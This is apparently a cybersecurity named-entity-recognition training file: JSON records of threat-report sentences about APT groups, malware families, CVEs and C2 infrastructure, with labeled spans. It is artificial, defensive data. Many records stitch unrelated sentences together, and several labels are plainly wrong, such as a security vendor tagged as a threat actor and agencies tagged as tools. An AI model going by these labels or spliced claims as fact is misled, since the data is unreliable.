Minzen : 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82 .", "spans": {"ORGANIZATION: Kryptowire": [[12, 22]], "ORGANIZATION: RedNaga Security": [[91, 107]], "ORGANIZATION: Adup": [[206, 210]], "THREAT_ACTOR: APT10": [[382, 387]], "ORGANIZATION: economic": [[432, 440]], "MALWARE: Minzen": [[516, 522]], "FILEPATH: 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82": [[525, 589]]}, "info": {"id": "cyberner_stix_train_000316", "source": "cyberner_stix_train"}} {"text": "These repackaged , malware-laden apps are neither on Google Play nor popular third-party app marketplaces , and we only saw the website hosting the malicious apps being promoted on social media when we followed GolfSpy ’ s trail . These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module . The main goal behind its malicious activities was to steal financial assets from companies , such as debit cards , or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts . Kaspersky said there was another case of end users being infected by the malware , which is known as \" Winnti . \"", "spans": {"SYSTEM: Google Play": [[53, 64]], "MALWARE: GolfSpy": [[211, 218]], "TOOL: beaconing": [[264, 273]], "TOOL: command-and-control server": [[283, 309]], "ORGANIZATION: Kaspersky": [[640, 649]], "MALWARE: the malware": [[709, 720]], "MALWARE: Winnti": [[743, 749]]}, "info": {"id": "cyberner_stix_train_000317", "source": "cyberner_stix_train"}} {"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . 
This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: document": [[7, 15]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "VULNERABILITY: CVE-2013-3906": [[80, 93]], "VULNERABILITY: CVE-2014-1761": [[97, 110]], "TOOL: emails": [[248, 254]], "FILEPATH: Microsoft Word attachment": [[262, 287]], "VULNERABILITY: CVE-2017-0199": [[320, 333]], "MALWARE: ZeroT Trojan": [[348, 360]], "MALWARE: PlugX Remote Access Trojan": [[392, 418]], "MALWARE: RAT": [[421, 424]]}, "info": {"id": "cyberner_stix_train_000318", "source": "cyberner_stix_train"}} {"text": "Using this collection of webshells , the actors moved laterally to other systems on the network by dumping credentials with a variant of the notorious Mimikatz tool and using Impacket ’s atexec tool to use dumped credentials to run commands on other systems .", "spans": {"TOOL: Mimikatz": [[151, 159]], "TOOL: Impacket": [[175, 183]]}, "info": {"id": "cyberner_stix_train_000319", "source": "cyberner_stix_train"}} {"text": "IMPACT EventBot is a mobile malware banking trojan that steals financial information , is able to hijack transactions . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"MALWARE: EventBot": [[7, 15]], "THREAT_ACTOR: ITG08’s": [[148, 155]], "MALWARE: More_eggs backdoor": [[311, 329]], "MALWARE: PIVY": [[332, 336], [598, 602]], "ORGANIZATION: chemical makers": [[410, 425]], "ORGANIZATION: government agencies": [[428, 447]], "ORGANIZATION: defense contractors": [[450, 469]], "THREAT_ACTOR: attackers": [[540, 549]], "VULNERABILITY: zero-day": [[557, 565]]}, "info": {"id": "cyberner_stix_train_000320", "source": "cyberner_stix_train"}} {"text": "Pay close attention to the contents of these fields as they appear base64 encoded .", "spans": {}, "info": {"id": "cyberner_stix_train_000321", "source": "cyberner_stix_train"}} {"text": "Since that report , we continued our research into this oddity .", "spans": {}, "info": {"id": "cyberner_stix_train_000322", "source": "cyberner_stix_train"}} {"text": "Allows an application to force the device to lock Allows applications to access information about Wi-Fi networks . CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop . Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017 .", "spans": {"THREAT_ACTOR: CIA's": [[115, 120]], "TOOL: GCHQ": [[208, 212]], "TOOL: NSA": [[215, 218]], "TOOL: cyber arms contractors": [[243, 265]], "THREAT_ACTOR: Gallmaker": [[285, 294]]}, "info": {"id": "cyberner_stix_train_000323", "source": "cyberner_stix_train"}} {"text": "Malware authors use injected clicks , custom HTML parsers and SMS receivers to automate the billing process without requiring any interaction from the user . 
APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools . FindDialPass List all the dial-up accounts and passwords . Although attacks on education have been a staple of the ransomware ecosystem for years , Vice Society appears to have specialised in delivering misery to schools , colleges , and universities in a highly unusual way .", "spans": {"THREAT_ACTOR: APT40": [[158, 163]], "TOOL: publicly available tools": [[317, 341]], "ORGANIZATION: education": [[423, 432]], "MALWARE: ransomware": [[459, 469]], "THREAT_ACTOR: Vice Society": [[492, 504]], "ORGANIZATION: schools": [[557, 564]], "ORGANIZATION: colleges": [[567, 575]], "ORGANIZATION: universities": [[582, 594]]}, "info": {"id": "cyberner_stix_train_000324", "source": "cyberner_stix_train"}} {"text": "The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations .", "spans": {"ORGANIZATION: CTU": [[57, 60]], "THREAT_ACTOR: TG-3390": [[87, 94]]}, "info": {"id": "cyberner_stix_train_000325", "source": "cyberner_stix_train"}} {"text": "Continuing to use this artifact , we discovered another domain with the same content body , supservermgr.com .", "spans": {}, "info": {"id": "cyberner_stix_train_000326", "source": "cyberner_stix_train"}} {"text": "A well-known international organization Military targets in Europe Governments in Europe A government of a South American country An embassy belonging to an Eastern European country .", "spans": {}, "info": {"id": "cyberner_stix_train_000327", "source": "cyberner_stix_train"}} {"text": "Please note this is not a comprehensive chart of all Zebrocy and Koadic samples we were able to collect .", "spans": {"MALWARE: Zebrocy": [[53, 60]]}, 
"info": {"id": "cyberner_stix_train_000328", "source": "cyberner_stix_train"}} {"text": "The module inspects every new disk volume attached to the system .", "spans": {}, "info": {"id": "cyberner_stix_train_000329", "source": "cyberner_stix_train"}} {"text": "While the motivation for each APT32 private sector compromise varied – and in some cases was unknown – the unauthorized access could serve as a platform for law enforcement , intellectual property theft , or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations . Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates .", "spans": {"THREAT_ACTOR: APT32": [[30, 35]], "ORGANIZATION: law enforcement": [[157, 172]], "ORGANIZATION: companies": [[540, 549]], "ORGANIZATION: government agencies": [[554, 573]]}, "info": {"id": "cyberner_stix_train_000330", "source": "cyberner_stix_train"}} {"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . 
The Sogu gang use a custom developed threat – Backdoor.Sogu , whereas the group described in this document use an off the shelf threat – Poison Ivy .", "spans": {"TOOL: technical exploitation capabilities": [[29, 64]], "VULNERABILITY: zero-day exploits": [[131, 148]], "MALWARE: Backdoor.Sogu": [[371, 384]], "MALWARE: Poison Ivy": [[462, 472]]}, "info": {"id": "cyberner_stix_train_000331", "source": "cyberner_stix_train"}} {"text": "CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "ORGANIZATION: Cisco": [[54, 59]], "TOOL: VPN": [[60, 63], [120, 123]]}, "info": {"id": "cyberner_stix_train_000332", "source": "cyberner_stix_train"}} {"text": "They also state that the code is written from scratch and is not using parts of other existing banking Trojans unlike many other Trojans that are either based completely on the source of another Trojan ( such as the leaked Anubis source code that is now being resold ) or at least borrow parts of other Trojans . The group behind Machete uses effective spearphishing techniques . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": {"MALWARE: Anubis": [[223, 229]], "THREAT_ACTOR: Machete": [[330, 337]], "THREAT_ACTOR: APT38": [[380, 385]], "ORGANIZATION: banks": [[431, 436]], "ORGANIZATION: financial institutions": [[447, 469]]}, "info": {"id": "cyberner_stix_train_000333", "source": "cyberner_stix_train"}} {"text": "Currently Running Applications Banking Trojans that rely on the overlay mechanism to steal information need to know what application is in the foreground . Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group . 
Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false . Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the “ PIG RANGE ” .", "spans": {"THREAT_ACTOR: ScarCruft": [[289, 298]], "THREAT_ACTOR: APT group": [[299, 308]], "ORGANIZATION: FBI": [[330, 333]], "ORGANIZATION: Hack520": [[499, 506]]}, "info": {"id": "cyberner_stix_train_000334", "source": "cyberner_stix_train"}} {"text": "For example , the password of the WiFi network used by the phone was stored in the folder /storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226-299FCF2B4242/ using the following file name format DD_MM_2019_HH_mm_ss_XXXXXXXXXXXXX.txt.crypt ( the datetime followed by the IMEI ) . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . Federation of Independent Palestinian Communities and Organizations and Events in the Diaspora . This is clear and shocking evidence of a deliberate and malicious attack by Russia against Ukraine which had significant consequences on ordinary people and businesses in Ukraine and across Europe .", "spans": {"MALWARE: Backdoor.Nidiran": [[390, 406]], "ORGANIZATION: Federation of Independent Palestinian Communities and Organizations and Events": [[509, 587]], "MALWARE: malicious attack": [[662, 678]], "THREAT_ACTOR: Russia": [[682, 688]], "ORGANIZATION: Ukraine": [[697, 704]]}, "info": {"id": "cyberner_stix_train_000335", "source": "cyberner_stix_train"}} {"text": "The malware was able to perform overlay attacks and become the default SMS app through the abuse of the Accessibility Service . 
A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 . It has targeted countries including Israel , Saudi Arabia , Turkey , the U.S. , Jordan , and Germany .", "spans": {"ORGANIZATION: Recorded Future": [[248, 263]], "ORGANIZATION: Rapid7": [[268, 274]]}, "info": {"id": "cyberner_stix_train_000336", "source": "cyberner_stix_train"}} {"text": "10/03/2020 At the end of February the actors behind Ginp added screen capture capabilities to their Trojan . During this operation (dubbed ‘Cloud Hopper” because of the group’s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes as well as some familiar old tools . The threat often uses compromised web servers in Japan and the Republic of Korea .", "spans": {"MALWARE: Ginp": [[52, 56]], "THREAT_ACTOR: APT10": [[224, 229]], "TOOL: (Quasar RAT": [[256, 267]], "TOOL: Trochilus": [[270, 279]], "TOOL: RedLeaves": [[282, 291]], "TOOL: ChChes": [[294, 300]]}, "info": {"id": "cyberner_stix_train_000337", "source": "cyberner_stix_train"}} {"text": "We do not know whether the files are legitimate Palestinian Authority documents , but they are designed to look official .", "spans": {"ORGANIZATION: Palestinian Authority": [[48, 69]]}, "info": {"id": "cyberner_stix_train_000338", "source": "cyberner_stix_train"}} {"text": "At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments — to the tune of at least $150,000 per hit . 
TG-3390 uses the PlugX remote access tool .", "spans": {"ORGANIZATION: financial establishments": [[91, 115]], "THREAT_ACTOR: TG-3390": [[161, 168]], "MALWARE: PlugX remote access tool": [[178, 202]]}, "info": {"id": "cyberner_stix_train_000339", "source": "cyberner_stix_train"}} {"text": "Talos found 189 logos from banks to cryptocurrency exchanges inside the archive , all of which could be targeted . The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry . Derusbi : File Name : 32.dll . We have observed TANKTRAP being used with other disruptive tools including NEARMISS , SDELETE , PARTYTICKET , and CADDYWIPER .", "spans": {"THREAT_ACTOR: group": [[119, 124]], "ORGANIZATION: governmental": [[147, 159]], "MALWARE: Derusbi": [[225, 232]], "FILEPATH: 32.dll": [[247, 253]], "TOOL: TANKTRAP": [[273, 281]]}, "info": {"id": "cyberner_stix_train_000340", "source": "cyberner_stix_train"}} {"text": "REQUEST_IGNORE_BATTERY_OPTIMIZATIONS - Whitelists the application to allow it to ignore battery optimizations . Bitdefender’s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank’s employees . 
Starting in mid-February .", "spans": {"THREAT_ACTOR: Bitdefender’s": [[112, 125]], "ORGANIZATION: bank’s": [[268, 274]]}, "info": {"id": "cyberner_stix_train_000341", "source": "cyberner_stix_train"}} {"text": "This group has no known associations to other activity groups .", "spans": {}, "info": {"id": "cyberner_stix_train_000342", "source": "cyberner_stix_train"}} {"text": "While one of these modules gathers system information and another attempts to steal the victim ’s usernames and passwords , as one would expect from a malware used for a targeted attack , the other two known OnionDuke modules are quite the opposite ; one is designed for use in DoS S-TOOL attacks and the other for posting predetermined messages to the Russian VKontakte social media site .", "spans": {"MALWARE: OnionDuke": [[208, 217]], "TOOL: VKontakte": [[361, 370]]}, "info": {"id": "cyberner_stix_train_000343", "source": "cyberner_stix_train"}} {"text": "These samples were located by pivoting on document attributes .", "spans": {}, "info": {"id": "cyberner_stix_train_000344", "source": "cyberner_stix_train"}} {"text": "This document reports that Ismail Hanieyh , the political leader of Hamas , had notified the Egyptian government that he will remain abroad after his visit to Tehran to take part in Soleimani ’s funeral , which sparked tension with the Egyptian authorities .", "spans": {}, "info": {"id": "cyberner_stix_train_000345", "source": "cyberner_stix_train"}} {"text": "The discovery of this new PLATINUM technique and the development of detection capabilities highlight the work the Windows Defender ATP team does to provide customers greater visibility into suspicious activities transpiring on their networks . 
This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users .", "spans": {"THREAT_ACTOR: PLATINUM": [[26, 34]], "ORGANIZATION: Windows Defender ATP": [[114, 134]]}, "info": {"id": "cyberner_stix_train_000346", "source": "cyberner_stix_train"}} {"text": "The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from .", "spans": {"ORGANIZATION: Kaspersky": [[17, 26]], "VULNERABILITY: zero-day exploit": [[52, 68]], "THREAT_ACTOR: BlackOasis": [[77, 87]], "THREAT_ACTOR: Turla": [[187, 192]]}, "info": {"id": "cyberner_stix_train_000347", "source": "cyberner_stix_train"}} {"text": "WAKE_LOCK - Allows the application to use PowerManager WakeLocks to keep the processor from sleeping or the screen from dimming . A Carbanak trademark in cyberattacks remains the use of Cobalt Strike – a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors – which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools . Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April .", "spans": {"THREAT_ACTOR: Carbanak": [[132, 140]], "TOOL: Cobalt Strike": [[186, 199]], "MALWARE: Bitly": [[525, 530]], "THREAT_ACTOR: Gorgon Group": [[553, 565]]}, "info": {"id": "cyberner_stix_train_000348", "source": "cyberner_stix_train"}} {"text": "Malware code showing handover from initial module to main payload Figure 13 . 
APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . We used different archiving tools such as PowerArchiver 2019 , WinZip , WinRar , 7Zip , and unzIP S-TOOL that is built into the Windows OS in attempting to extract the content of the attachment SHIPPING_MX00034900_PL_INV_pdf.zip . While this shift likely reflects the increased tempo of wartime cyber operations , it also reveals the GRU ’s priority objectives in OT attacks .", "spans": {"THREAT_ACTOR: APT15": [[78, 83]], "THREAT_ACTOR: cyberespionage": [[108, 122]], "ORGANIZATION: oil industry": [[237, 249]], "ORGANIZATION: government contractors": [[252, 274]], "ORGANIZATION: military": [[277, 285]], "TOOL: PowerArchiver 2019": [[341, 359]], "TOOL: WinZip": [[362, 368]], "TOOL: WinRar": [[371, 377]], "TOOL: 7Zip": [[380, 384]], "TOOL: unzIP S-TOOL": [[391, 403]], "SYSTEM: Windows": [[427, 434]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[493, 527]], "THREAT_ACTOR: OT attacks .": [[663, 675]]}, "info": {"id": "cyberner_stix_train_000349", "source": "cyberner_stix_train"}} {"text": "The actor sends an email to trala.cosh2@post.cz with the unique system identifier as a subject with a secondary email account and credentials in ASCII hexadecimal format within the message body .", "spans": {"TOOL: email": [[19, 24], [112, 117]], "EMAIL: trala.cosh2@post.cz": [[28, 47]], "TOOL: ASCII": [[145, 150]]}, "info": {"id": "cyberner_stix_train_000350", "source": "cyberner_stix_train"}} {"text": "Comparing it to OSX_DOK.C , we can see that it uses the same script format .", "spans": {"MALWARE: OSX_DOK.C": [[16, 25]]}, "info": {"id": "cyberner_stix_train_000351", "source": "cyberner_stix_train"}} {"text": "This simulation shows that FakeSpy behaves differently on a physical device versus an emulator . 
Given FIN7’s previous use of false security companies , we decided to look deeper into this one . During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets .", "spans": {"MALWARE: FakeSpy": [[27, 34]], "THREAT_ACTOR: FIN7’s": [[103, 109]], "ORGANIZATION: security companies": [[132, 150]], "ORGANIZATION: ministries of foreign affairs": [[282, 311]], "ORGANIZATION: FireEye": [[324, 331]], "THREAT_ACTOR: Ke3chang": [[352, 360]]}, "info": {"id": "cyberner_stix_train_000353", "source": "cyberner_stix_train"}} {"text": "Note that inside this single response , there is one “ install_true ” command , one “ sms_grab ” command and four “ sms_send ” commands . In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware . Everything starts with a malicious document using a well-known vulnerability to download a malicious document hosted on the internet . 
It is possible that the malware was used to support exercises such as the ones hosted by Rostelecom - Solar in 2021 in collaboration with the Russian Ministry of Energy or in 2022 for the ( SPIEF ) .", "spans": {"THREAT_ACTOR: APT34": [[165, 170]], "TOOL: PowerShell-based backdoor": [[216, 241]], "TOOL: POWRUNER": [[255, 263]], "TOOL: BONDUPDATER": [[341, 352]], "MALWARE: malware": [[552, 559]], "ORGANIZATION: Rostelecom - Solar": [[617, 635]], "ORGANIZATION: Russian Ministry of Energy": [[670, 696]], "ORGANIZATION: SPIEF": [[718, 723]]}, "info": {"id": "cyberner_stix_train_000354", "source": "cyberner_stix_train"}} {"text": "Each of the phishing sites contained links to a distribution manifest , which contained metadata such as the application name , version , icon , and a URL for the IPA file . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"THREAT_ACTOR: Leafminer": [[174, 183]], "VULNERABILITY: SMB vulnerabilities": [[298, 317]], "ORGANIZATION: Microsoft": [[331, 340]], "ORGANIZATION: Trend Micro": [[357, 368]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[402, 421]]}, "info": {"id": "cyberner_stix_train_000355", "source": "cyberner_stix_train"}} {"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . 
Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": {"MALWARE: TONEDEAF": [[0, 8]], "FILEPATH: malicious files": [[167, 182]], "MALWARE: iviewers.dll file": [[214, 231]], "MALWARE: DLL load hijacking": [[245, 263]]}, "info": {"id": "cyberner_stix_train_000356", "source": "cyberner_stix_train"}} {"text": "While admittedly the version numbers provided by SharePoint within HTTP responses do not always provide the precise SharePoint version number , we decided to use it to check if it was less than the version numbers of the patched SharePoint versions from the Microsoft advisory .", "spans": {"TOOL: SharePoint": [[49, 59], [116, 126], [229, 239]], "ORGANIZATION: Microsoft": [[258, 267]]}, "info": {"id": "cyberner_stix_train_000357", "source": "cyberner_stix_train"}} {"text": "The website uses a different fixed twitter account ( https : //twitter.com/fdgoer343 ) . APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" . The controller issued the command to write the base64-decoded and modified data to the file name set earlier in the exchange . 
Talos eventually uncovered additional campaigns , including the two previously mentioned by Ukraine ’s Computer Emergency Response Team ( CERT - UA ) and FortiGuard Labs researchers .", "spans": {"ORGANIZATION: twitter": [[35, 42]], "THREAT_ACTOR: APT17": [[89, 94]], "TOOL: BLACKCOFFEE malware": [[144, 163]], "ORGANIZATION: information security community": [[252, 282]], "ORGANIZATION: Talos": [[442, 447]], "ORGANIZATION: Ukraine ’s Computer Emergency Response Team ( CERT - UA )": [[534, 591]], "ORGANIZATION: FortiGuard Labs researchers": [[596, 623]]}, "info": {"id": "cyberner_stix_train_000358", "source": "cyberner_stix_train"}} {"text": "After some major upgrade , by mid-June , the “ Agent Smith ” campaign reached its peak . In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address . With these capabilities , Microsoft Defender ATP provides comprehensive protection against Dexphot and the countless other complex and evolving threats that we face every day . To increase investigation transparency , we are including a Last Known True , or LKT , value for network indicators .", "spans": {"MALWARE: Agent Smith": [[47, 58]], "TOOL: Microsoft Defender ATP": [[350, 372]], "MALWARE: Dexphot": [[415, 422]]}, "info": {"id": "cyberner_stix_train_000359", "source": "cyberner_stix_train"}} {"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . 
which has been active since at least 2011 .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: (CVE-2018-0802)": [[62, 77]]}, "info": {"id": "cyberner_stix_train_000360", "source": "cyberner_stix_train"}} {"text": "Some of the observed GeminiDuke samples that used timestamps as mutex names were compiled while MSK still respected DST and for these samples , the timestamps perfectly align with MSK as it was defined at the time .", "spans": {"MALWARE: GeminiDuke": [[21, 31]]}, "info": {"id": "cyberner_stix_train_000361", "source": "cyberner_stix_train"}} {"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . which they launched targeted attacks against Russian banks , businesses and media companies .", "spans": {"MALWARE: Mimikatz": [[46, 54]], "ORGANIZATION: banks": [[178, 183]], "ORGANIZATION: businesses": [[186, 196]], "ORGANIZATION: media companies": [[201, 216]]}, "info": {"id": "cyberner_stix_train_000362", "source": "cyberner_stix_train"}} {"text": "This led us to additional infrastructure for Zebrocy at 185.25.51.198 and 185.25.50.93 .", "spans": {"MALWARE: Zebrocy": [[45, 52]], "IP_ADDRESS: 185.25.51.198": [[56, 69]], "IP_ADDRESS: 185.25.50.93": [[74, 86]]}, "info": {"id": "cyberner_stix_train_000363", "source": "cyberner_stix_train"}} {"text": "It also harvests call details and SMS logs as shown below . The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . In other recent attacks ( January 2017 ) , the group used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware as described by ClearSky . 
UNC2452 is a sophisticated group that has targeted government and private sector entities worldwide .", "spans": {"THREAT_ACTOR: admin@338": [[64, 73]], "ORGANIZATION: governments": [[157, 168]], "TOOL: Juniper Networks VPN": [[326, 346]], "ORGANIZATION: University of Oxford": [[363, 383]], "ORGANIZATION: ClearSky": [[428, 436]], "THREAT_ACTOR: UNC2452": [[439, 446]], "ORGANIZATION: government": [[490, 500]], "ORGANIZATION: private sector entities worldwide": [[505, 538]]}, "info": {"id": "cyberner_stix_train_000364", "source": "cyberner_stix_train"}} {"text": "Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network . CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": {"THREAT_ACTOR: APT40": [[40, 45]], "TOOL: Gh0st RAT trojan": [[156, 172]], "ORGANIZATION: CTU": [[224, 227]], "THREAT_ACTOR: Threat Group-1314": [[292, 309]]}, "info": {"id": "cyberner_stix_train_000365", "source": "cyberner_stix_train"}} {"text": "The primary goal of these attacks was likely to find code-signing certificates for signing future malware . Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology .", "spans": {"ORGANIZATION: FireEye": [[349, 356]], "ORGANIZATION: Dragos'": [[361, 368]], "MALWARE: TRITON": [[402, 408]]}, "info": {"id": "cyberner_stix_train_000366", "source": "cyberner_stix_train"}} {"text": "Devices running Android 4.4 and higher are protected by Verified Boot . 
Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . APT16 actors were likely also responsible for the June 2015 activity . Uncovering weaknesses in Apple macOS and VMWare vCenter : 12 vulnerabilities in RPC implementation •", "spans": {"SYSTEM: Android 4.4": [[16, 27]], "ORGANIZATION: Kaspersky Lab": [[72, 85]], "VULNERABILITY: Microsoft Office exploits": [[109, 134]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[182, 209]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[212, 239]], "THREAT_ACTOR: APT16": [[242, 247]], "SYSTEM: Apple macOS": [[338, 349]], "SYSTEM: VMWare vCenter": [[354, 368]]}, "info": {"id": "cyberner_stix_train_000367", "source": "cyberner_stix_train"}} {"text": "After the checks , the malware becomes active , but first , it goes through seven steps , each one calling a different command : uploadPhoneNumbers : Exfiltrates all phone numbers that are in the contact list . The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location . The DllInstall export function is responsible for the core behavior of the malware , as just loading it does nothing . 
For this reason , the particular actions intended by the actor are unclear without further knowledge about the targeted assets .", "spans": {"THREAT_ACTOR: Seedworm group": [[215, 229]], "TOOL: Powermud backdoor": [[243, 260]], "TOOL: command-and-control": [[310, 329]], "MALWARE: DllInstall": [[353, 363]], "THREAT_ACTOR: actor": [[525, 530]]}, "info": {"id": "cyberner_stix_train_000368", "source": "cyberner_stix_train"}} {"text": "This check serves two purposes :", "spans": {}, "info": {"id": "cyberner_stix_train_000369", "source": "cyberner_stix_train"}} {"text": "This variant of SofacyCarberp was configured to use the following domain as its C2 server : cdnverify.net .", "spans": {"MALWARE: SofacyCarberp": [[16, 29]], "TOOL: C2": [[80, 82]], "DOMAIN: cdnverify.net": [[92, 105]]}, "info": {"id": "cyberner_stix_train_000370", "source": "cyberner_stix_train"}} {"text": "One of its most notable routines is capturing voice calls in real time by hooking into the “ mediaserver ” system service . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . 
referred in his blog ) None Use of open source libraries for protocol implementation : The availability of open source projects that implement OT protocols can lower the barrier of entry for actors attempting to interact with OT devices .", "spans": {"VULNERABILITY: Carbanak": [[195, 203]], "TOOL: Ammy Admin": [[298, 308]], "TOOL: Team Viewer": [[313, 324]], "TOOL: open source libraries for protocol implementation": [[362, 411]], "TOOL: open source projects that implement OT protocols": [[434, 482]]}, "info": {"id": "cyberner_stix_train_000371", "source": "cyberner_stix_train"}} {"text": "In that case , you first need to send the text “ 393838 ” in an SMS to the infected device and then repeat all the actions described above ; that text message will change the C & C address to “ : // ” , so the phone will no longer receive commands from the real C & C . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system . Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues .", "spans": {"MALWARE: Careto": [[299, 305]], "ORGANIZATION: FireEye": [[444, 451], [468, 475]], "ORGANIZATION: FaaS": [[491, 495]], "ORGANIZATION: Mandiant Consulting": [[500, 519]], "ORGANIZATION: iSIGHT Intelligence": [[526, 545]], "ORGANIZATION: engineering": [[612, 623]], "ORGANIZATION: maritime entities": [[628, 645]]}, "info": {"id": "cyberner_stix_train_000372", "source": "cyberner_stix_train"}} {"text": "If you ’ ve downloaded one of the apps listed in Appendix A , below , you might be infected . 
